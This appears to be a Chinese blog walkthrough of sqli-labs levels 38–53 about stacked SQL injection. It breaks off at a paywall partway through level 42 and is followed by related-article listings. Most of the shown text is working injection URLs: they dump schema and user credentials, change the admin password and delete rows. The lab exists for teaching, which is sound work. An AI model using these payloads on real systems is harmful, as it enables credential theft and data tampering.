sqli-labs(38-53)

最新推荐文章于 2024-08-11 22:05:00 发布
最新推荐文章于 2024-08-11 22:05:00 发布
阅读量979 收藏 1
点赞数
分类专栏: Web安全 文章标签: sql mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_43395215/article/details/108245668
版权
本文详细介绍了sqli-labs的第38至53关,主要探讨了SQL堆叠注入、闭合判断、数据库操作、盲注和延时注入等技术。通过各种注入方法,包括利用数字型闭合、字符型闭合、报错注入、延时注入等,实现了数据的查询、插入、更新和删除。同时,文章还讲解了如何在没有错误提示的情况下进行布尔盲注和延时注入,以及在多条语句执行中的堆叠注入策略。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

第38关:

这一关挺简单的,就一个闭合判断,就可爆数据,但是,这一关的目的不是查询数据,而是通过堆叠注入,对数据库执行操作

堆叠注入,就是利用sql中“;”是标志一句话结束,我们可以通过“;”将多个语句写入到sql语句中,这里的语句就不仅仅是指查询,还有增删查改

闭合判断:

/Less-38/?id=1' and 1=1 --+

sql注入:

#数据库名和用户:
/Less-38/?id=-1'%20 union all select 1,database(),session_user()--+
#数据库表名:
/Less-38/?id=-1' union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
#表的列名:
/Less-38/?id=-1' union all select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

现在我们有的库名、表名、还有列名,现在希望可以在数据库中插入一个用户,采用堆叠注入

判断插入是否成功,可以检查数据库,也可以通过查询检查

/Less-38/?id=-1' union all select 1,username,password from users where username='hello'--+

查询成功,我们的数据插入时没问题的

现在希望可以更新admin用户的密码,采用堆叠注入

/Less-38/?id=1';update users set password='hello'  where username='admin'--+

判断修改是否成功,通过联合查询检查

/Less-38/?id=8

现在希望删除hello用户,采用堆叠注入

/Less-38/?id=1';delete from users where username='hello'--+

判断是否删除

/Less-38/?id=-1' union all select 1,username,password from users where username='hello' --+
或
/Less-38/?id=-1' union all select 1,group_concat(username),3 from users--+

第39关:

判断闭合:

/Less-39/?id=1 and 1=2--+

这一关和上一关一样,同样是堆叠注入,只是闭合方式不同,采用数字型
操作方法与上面一致,先收集数据,再对数据库操作

第40关:

判断闭合:

/Less-40/index.php?id=1') and 1=2--+

这一关和上一关一样,同样是堆叠注入,只是闭合方式不同,采用数字型
操作方法与上面一致,先收集数据,再对数据库操作

第41关:

判断闭合:

/Less-41/?id=1 and 1=2--+

这一关和上一关一样,同样是堆叠注入,只是闭合方式不同,采用数字型
操作方法与上面一致,先收集数据,再对数据库操作

这一关并没有语法错误的提示,所以要自己判断语句的正确性

第42关:

关键代码:

$username= $_SESSION["username"];
$curr_pass= mysql_real_escape_string($_POST
最低0.47元/天 解锁文章
基于Sqli-Labs靶场的SQL注入-38~45关
Joker
01-11 1025
这一篇博客我主要讲了堆叠注入,包括堆叠注入原理、注入条件、注入方法等。堆叠注入的前提条件多,可以实际应用的场景较少。但是只要能够进行堆叠注入,就可以对后台数据库造成很大的伤害。
网络安全 - Web 安全靶场 - sqli-labs-php7.zip
10-13
sqli-labs-php7.zip资源描述 sqli-labs-php7.zip是一个专注于SQL注入学习的资源包,特别适用于PHP 7.3及以上版本的环境。它提供了一个全面的练习平台,帮助用户深入理解SQL注入攻击的原理,并提升相应的防御技巧。 ...
sqli-labs(38)
weixin_30522095的博客
06-01 216
0X01 ?id=1' and 1=1%23 正确   ?id=1' and 1=2%23 错误 存在注入 0x1 堆叠注入讲解 (1)前言   国内有的称为堆查询注入,也有称之为堆叠注入。个人认为称之为堆叠注入更为准确。堆叠注入为攻击者提供了很多的攻击手段,通过添加一个新 的查询或者终止查询,可以达到修改数据和调用存储过程的目的。这种技术在SQL注入中还是比较频繁的。 (2...
SQLi Labs Less-38 堆叠注入
热门推荐
wangyuxiang946的博客
06-22 1万+
第三十八关请求方式为GET请求 , 注入类型为 单引号字符串型注入 第一步,测试注入方式 ?id=1' and false-- a SQL不成立时 , 结果不显示 , 固 单引号字符串型注入 , 源码如下 本题的重点在 mysqli_multi_query() , 可同时执行多条SQL , 即叠加注入 第二步,判断字段数 使用order by 排序 测试字段数量 ?id=1' order by 4 -- a 从第1列开始测试 , 直至报错 , 第4列开始异...
sqli-labs(38-41)
qq_43579362的博客
02-17 428
0x01 原理 堆叠注入,顾名思义就是很多语句结合在一起进行注入,在sql语句中,以;标志着一条语句的结束,要实现堆叠注入就是用;连接多条语句进行注入,即我们可以结束一个语句后,构造下一个语句。而union select也是将两条语句结合在一起一起执行,两者有何区别?区别在于联合注入只能使用查询语句,而堆叠注入可以使用任何语句,可以使用任何语句并不代表着它没有限制,它可能受到API,数据库引擎,权...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
Sqli-labs-maste 靶场的下载, phpStudy 下载
09-13
"Sqli-labs-maste"是一个专门设计用来练习和提高SQL注入技术的靶场环境,它提供了各种不同难度级别的SQL注入漏洞供用户尝试解决,从而帮助学习者深入理解SQL注入的原理和防御技术。 与此同时,"phpStudy"是一个流行...
sqli-labs 靶场源码
最新发布
01-06
部署sqli-labs靶场的过程相对简单。首先,需要有一个支持PHP的服务器环境,这可以是本地服务器如XAMPP、WAMP或MAMP,也可以是在线的虚拟私人服务器(VPS)。接下来,下载sqli-labs的源代码包,解压后上传到服务器的...
sqli-labs-master.zip
01-18
Sqli-labs是一个在线的SQL注入练习平台,提供了一系列关卡供用户练习SQL注入的技巧和防范方法。在这个平台上,用户可以尝试注入攻击,并测试自己的技能和工具,同时也可以学习如何防止SQL注入攻击。Sqli-labs旨在...
sqli-labs通关攻略38-53[Stacked Injections]
Keepb1ue的博客
08-10 5362
Stacked Injections 文章目录Stacked Injectionsless-38less-39less-40less-41less-42less-43less-44less-45less-46less-47less-48less-49less-50less-51less-52less-53 less-38 由于在这里使用了执行一个或多个sql语句的函数mysqli_multi_query。 所以可以尝试堆叠注入,堆叠注入就是执行多条SQL语句,通过;分割;在实战中,由于正常数据库只会回显出
2024年CentOS RHEL 系统更新安全补丁的方法_怎样升级red hat 补丁(2),网络安全音频面试
2401_84264244的博客
05-05 649
默认情况下, cron 任务被配置成了立即下载并安装所有更新,但是我们可以通过在 /etc/sysconfig/yum-cron 配置文件中把下面两个参数改为yes,从而改变这种行为。为了使来自 root@localhost 的通知能够通过邮件发送给同一账户(再次说明,你可以选择其他账户,如果你想这样的话),下面这些行也是必须的。安装完成以后,打开/etc/yum/yum-cron.conf,然后找到下面这些行内容,你必须确保它们的值和下面展示的一样。而其它的行保证了能够通知并自动下载、安装安全升级。
sql-labs闯关38~45
qq_44663230的博客
09-07 1906
sql-labs 38~45 堆叠注入篇
SQLi-LABS-Page-3-less-38-53注入教程
残阳泼茶香的博客
03-17 609
Lesson - 38GET - Stacked Query Injection - String堆叠的查询 输入http://sql/Less-38/?id=1 ’ 报错显示说“1” 后面多了一个单引号, 那么就上手吧。 `http://sql/Less-38/?id=1%27%20order%20by%203%23,按着步骤来,http://sql/Less-38/?id=-1%20%2...
SQLi Labs Stacked Injections ( Lesson38 - Lesson53 )
1ame的博客
08-30 1374
第三部分:Stacked Injection Stacked Queries Execute multiple statements in the same query to extend the possibilities of SQL injections Stacked queries provide a lot of control to the attacker.
sqli-labs第36~38
weixin_46023655的博客
08-11 494
sqli-labs第36~38
sqli-labs 38-45
遇事不决冲冲冲
04-09 1155
38关 堆叠注入:简单理解就是一条语句结束后再连接一条语句,这就叫堆叠注入。 举几个最简单的例子: 查询数据并创建一个数据库:select * from users;creat database test; 查询数据并删除一个数据库:select * from users;drop database test; 查询数据并插入数据:select * from users;insert into users(id,username,password) values(‘id’,‘username’,‘pas
sqli-labs通关全解----堆叠注入---38~45---11
cyynid的博客
01-13 549
本文引入一个新的概念:堆叠注入Stackedinjections:堆叠注入。从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql中,主要是命令行中,每一条语句结尾加;表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stacked injection。在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在;结束一个sql 语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。
(手工)【sqli-labs38、39】堆叠注入、报错回显、字符/数字型
07-15 548
SQL-堆叠注入、报错回显】
掌握SQL注入技术的sqli-labs-master教程
标题:“sqli-labs-master” 知识点: sqli-labs-master是一个专门用于练习SQL注入的项目,它为初学者和有经验的开发者提供了一个环境,用于学习、测试和提高SQL注入攻击的技巧。SQL注入是一种代码注入技术,攻击者...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值